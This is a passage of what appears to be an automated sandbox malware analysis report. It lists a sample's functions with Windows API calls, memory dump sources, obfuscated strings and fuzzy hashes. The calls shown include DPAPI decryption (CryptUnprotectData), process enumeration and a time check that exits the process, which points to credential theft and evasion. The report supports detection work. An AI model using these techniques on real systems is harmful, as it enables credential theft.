                  • LocalFree.KERNEL32(?,?,?,?,002E4EEE,00000000,?), ref: 002E9B3F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID: N.
                  • API String ID: 4291131564-1444805592
                  • Opcode ID: 048df4069512b678bd5b6636b84fb2608b787a0e6d92bcad2e4f38bb74888d4d
                  • Instruction ID: 26203c953a00010e4622e9a6acb2ac9753eb0cc534138c40a83bafef26f257ad
                  • Opcode Fuzzy Hash: 048df4069512b678bd5b6636b84fb2608b787a0e6d92bcad2e4f38bb74888d4d
                  • Instruction Fuzzy Hash: E311A2B4240208BFEB14CF64DC95FAA77B5FB8A704F208059FA159B390D7B6A941DB90
                  Function 006B8C42 Relevance: 7.9, Strings: 5, Instructions: 1664COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 3e}}$E`$I`}<$JBY$pr{{
                  • API String ID: 0-997465392
                  • Opcode ID: 7cf6599a59e889b7de2ea2791afb0a3d5de196288b5346b5a91cc2acb638082b
                  • Instruction ID: e1674a0eccf158fa95c7c00aed3ed555a65662c4e3e60a20433e97187d61423a
                  • Opcode Fuzzy Hash: 7cf6599a59e889b7de2ea2791afb0a3d5de196288b5346b5a91cc2acb638082b
                  • Instruction Fuzzy Hash: 70B238F360C2049FE704AE2DEC8577ABBE5EF94320F198A3DE6C5C7744E63598018696
                  Function 006B3B7C Relevance: 7.9, Strings: 5, Instructions: 1629COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: *So{$+{f$FO$I5o$tXy
                  • API String ID: 0-313380642
                  • Opcode ID: 5a09d47ceaf5478f1cade4340a73dda3ad300aa49755e74198095dd039d403d8
                  • Instruction ID: d246448ec3baf0e72bcfa381dd9ebc04d69c0e5911ffd093db1a858f4031c8e3
                  • Opcode Fuzzy Hash: 5a09d47ceaf5478f1cade4340a73dda3ad300aa49755e74198095dd039d403d8
                  • Instruction Fuzzy Hash: 1EB217F360C204AFE3046E29EC8567ABBEAEFD4720F1A453DE6C483744EA7558058697
                  Function 006BDD3F Relevance: 7.9, Strings: 5, Instructions: 1625COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (Bv?$OiUw$A:7$o$$~
                  • API String ID: 0-2293706008
                  • Opcode ID: 0850d68a01be43dabd410b73aef7460a4adc9dcbf28551dbfdd25dc25d6b4f14
                  • Instruction ID: fcb7d4f0fd74cc5e2d7da9ce145e9b03b2e2de8da50e543ffec457fbbe0e2694
                  • Opcode Fuzzy Hash: 0850d68a01be43dabd410b73aef7460a4adc9dcbf28551dbfdd25dc25d6b4f14
                  • Instruction Fuzzy Hash: F4B21AF3A0C2049FE3046E2DEC8567ABBE9EF94320F1A863DEAC4C7744E53558158697
                  Function 006AD1FA Relevance: 7.8, Strings: 5, Instructions: 1595COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: XnT$Xdm$c_d?$h0&o$pg
                  • API String ID: 0-963659292
                  • Opcode ID: fadefa855ec8968bafb18ef0ebf40fe9877e8311bbb6e82632d921141ae888bc
                  • Instruction ID: 9e528cafdc817cc17c0c03181f2f8b2e17a5dee8d6fa0e086b771d269b51d7ec
                  • Opcode Fuzzy Hash: fadefa855ec8968bafb18ef0ebf40fe9877e8311bbb6e82632d921141ae888bc
                  • Instruction Fuzzy Hash: 1EB2F5F36082049FE314AE2DEC85A7AFBE9EF94720F16493DE6C4C3744EA3558058697
                  Function 006BA7EE Relevance: 7.8, Strings: 5, Instructions: 1564COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &~?7$>i/$\~o$x]Z{$y]Z{
                  • API String ID: 0-1267071312
                  • Opcode ID: 5a29bb2a63f9b81d89a5ddefaa4824a7d8922d4f1ba33911baeb0c18a51f21d9
                  • Instruction ID: 229b0758463582afc3bab29713c28c4202b84d36fc268d6df36cb1492c15985d
                  • Opcode Fuzzy Hash: 5a29bb2a63f9b81d89a5ddefaa4824a7d8922d4f1ba33911baeb0c18a51f21d9
                  • Instruction Fuzzy Hash: ABB2D4F360C6049FE304AE2DEC8567AFBE6EF94320F1A493DE6C483744EA3558058697
                  Function 002EC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 002EC871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002EC87C
                  • lstrcat.KERNEL32(?,00300B46), ref: 002EC943
                  • lstrcat.KERNEL32(?,00300B47), ref: 002EC957
                  • lstrcat.KERNEL32(?,00300B4E), ref: 002EC978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 281b3e26d7c92e712145e4c0e933becfc34c34034037b596f6a95ad0bf3bffab
                  • Instruction ID: 4c6952f225b06515158b145d98cec82d3de0042bf332d9e57c63bab487ff365e
                  • Opcode Fuzzy Hash: 281b3e26d7c92e712145e4c0e933becfc34c34034037b596f6a95ad0bf3bffab
                  • Instruction Fuzzy Hash: 2B417EB5D1420ADBCB20DFA0DC89BFEB7B8BF48304F1041A8E509A6280D7709A85DF91
                  Function 002F6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 002F696C
                  • sscanf.NTDLL ref: 002F6999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002F69B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002F69C0
                  • ExitProcess.KERNEL32 ref: 002F69DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: c0266ccbb7b7d626f975344b94cfa31542339afa19fb59a738bd1445a32bd54e
                  • Instruction ID: 4d586b01141884ea609d3f29af4bd2f1cf75a37bd4633b9af08acf2d2c36f7dd
                  • Opcode Fuzzy Hash: c0266ccbb7b7d626f975344b94cfa31542339afa19fb59a738bd1445a32bd54e
                  • Instruction Fuzzy Hash: B821ECB5D1020DABCF04EFE4D9459EEB7B5FF58300F04852AE506E3250EB745619CB65
                  Function 002E7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 002E724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E7254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002E7281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002E72A4
                  • LocalFree.KERNEL32(?), ref: 002E72AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 8cafc868ac42c3cc20d600627efcb78fe65e5cbcc710a7d099cc9eb186996a5f
                  • Instruction ID: 03bc11c30e1b53f4288a8e92daa4760e92bf6743e1a69e53694d3e0137a36ced
                  • Opcode Fuzzy Hash: 8cafc868ac42c3cc20d600627efcb78fe65e5cbcc710a7d099cc9eb186996a5f
                  • Instruction Fuzzy Hash: 86011EB5A40208BBEB24DFE4DD4AF9E77B8EF44B00F104155FB05AB2C0D6B0AA059B65
                  Function 002F9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002F961E
                  • Process32First.KERNEL32(00300ACA,00000128), ref: 002F9632
                  • Process32Next.KERNEL32(00300ACA,00000128), ref: 002F9647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 002F965C
                  • CloseHandle.KERNEL32(00300ACA), ref: 002F967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: b0da6958e127f7981cd0d6ade9a8d5da3f5fa8d8eb540ad6c496264d99654c38
                  • Instruction ID: dd4bb6326335d66566d2845ed032f1c67f2b9aa86b2d327d65ee7133830af51e
                  • Opcode Fuzzy Hash: b0da6958e127f7981cd0d6ade9a8d5da3f5fa8d8eb540ad6c496264d99654c38
                  • Instruction Fuzzy Hash: D3010C75A1020CEBCB24DFA5CD48BEDB7F8EF58340F104198AA05D6240DB759B95DF51
                  Function 006A9BF1 Relevance: 6.6, Strings: 4, Instructions: 1649COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 8H1l$=m{$@Wo=$t|R
                  • API String ID: 0-1693746152
                  • Opcode ID: 71e86c35b7b28be9a58371fa4f559fa6cb3d0cf886d38aa1605be1cda0f8678c
                  • Instruction ID: bf630ef2da9334716930e855e78d876ed9ac64673c0efc5b006697550700d479
                  • Opcode Fuzzy Hash: 71e86c35b7b28be9a58371fa4f559fa6cb3d0cf886d38aa1605be1cda0f8678c
                  • Instruction Fuzzy Hash: 4EB207F36082049FE304AE2DEC8567AFBE9EF94720F1A493DE6C4C7744E63598418697
                  Function 002F8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,002E5184,40000001,00000000,00000000,?,002E5184), ref: 002F8EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
